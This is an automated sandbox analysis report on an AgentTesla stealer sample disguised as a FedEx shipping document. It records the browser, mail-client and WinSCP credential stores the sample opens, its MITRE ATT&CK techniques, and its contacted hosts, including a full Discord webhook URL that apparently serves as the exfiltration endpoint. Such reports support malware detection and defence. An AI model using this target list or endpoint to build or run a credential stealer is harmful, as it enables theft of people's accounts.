        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Users\user\Desktop\FeDex_shipping_document.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: Yara matchFile source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected AgentTesla
        Source: Yara matchFile source: 00000001.00000002.521394788.000000000305B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: FeDex_shipping_document.exe PID: 3628, type: MEMORYSTR

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts211
        Windows Management Instrumentation        		Path Interception111
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		11
        Security Software Discovery        		Remote Services1
        Email Collection        		Exfiltration Over Other Network Medium11
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
        Disable or Modify Tools        		21
        Input Capture        		131
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol21
        Input Capture        		Exfiltration Over Bluetooth1
        Ingress Tool Transfer        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
        Virtualization/Sandbox Evasion        		1
        Credentials in Registry        		1
        Application Window Discovery        		SMB/Windows Admin Shares1
        Archive Collected Data        		Automated Exfiltration3
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
        Process Injection        		NTDS1
        Remote System Discovery        		Distributed Component Object Model1
        Data from Local System        		Scheduled Transfer14
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA Secrets1
        System Network Configuration Discovery        		SSH1
        Clipboard Data        		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common2
        Software Packing        		Cached Domain Credentials114
        System Information Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        FeDex_shipping_document.exe38%ReversingLabsWin32.Trojan.Generic
        FeDex_shipping_document.exe34%VirustotalBrowse
        FeDex_shipping_document.exe100%Joe Sandbox ML

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        1.2.FeDex_shipping_document.exe.400000.0.unpack100%AviraHEUR/AGEN.1203035Download File

        Domains

        SourceDetectionScannerLabelLink
        discord.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        https://discord.com0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        http://discord.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        https://discord.com40%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DL0%Avira URL Cloudsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYj0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        https://discord.comD80%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        discord.com
        		162.159.138.232
        		truetrueunknown
        api4.ipify.org
        		64.185.227.155
        		truefalse
          		high
          api.ipify.org
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://api.ipify.org/false
              		high
              https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLpFFRiyRBhgIyiXf6D4mYjtrue
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.fontbureau.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.fontbureau.com/designersGFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://discord.comFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers/?FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.founder.com.cn/cn/bTheFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.fontbureau.com/designers?FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://media.discordapp.net/attachments/1085960984071524425/1087327699887980574/user-128757_20FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://discord.com/api/webhooks/1085961054116380784/6mOHAJEbhkHvMnx5Lupuieun02GlpoDDe4vKN3n-OIFv4DLFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.tiro.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://cdn.discordapp.com/attachments/1085960984071524425/1087327704275234847/user-128757_2023FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://discord.comFeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designersFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://discord.comD8FeDex_shipping_document.exe, 00000001.00000002.521394788.00000000030B0000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.goodfont.co.krFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.carterandcone.comlFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.sajatypeworks.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.typography.netDFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://media.discordapp.net/attachments/1085960984071524425/1087327704275234847/user-128757_20FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003169000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.com/designers/cabarga.htmlNFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.founder.com.cn/cn/cTheFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://api.ipify.orgFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://fontfabrik.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.founder.com.cn/cnFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://cdn.discordapp.com/attachments/1085960984071524425/1087327699887980574/user-128757_2023FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003098000.00000004.00000800.00020000.00000000.sdmp, FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003057000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://discord.com4FeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003074000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.galapagosdesign.com/DPleaseFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8FeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fonts.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.sandoll.co.krFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.urwpp.deDPleaseFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.zhongyicts.com.cnFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFeDex_shipping_document.exe, 00000001.00000002.521394788.0000000003011000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sakkal.comFeDex_shipping_document.exe, 00000000.00000002.272021390.0000000007322000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              162.159.138.232
                                              		discord.comUnited States
                                              		13335CLOUDFLARENETUStrue
                                              64.185.227.155
                                              		api4.ipify.orgUnited States
                                              		18450WEBNXUSfalse
                                              162.159.135.232
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              General Information

                                              Joe Sandbox Version:37.0.0 Beryl
                                              Analysis ID:830454
                                              Start date and time:2023-03-20 11:50:40 +01:00
                                              Joe Sandbox Product:CloudBasic
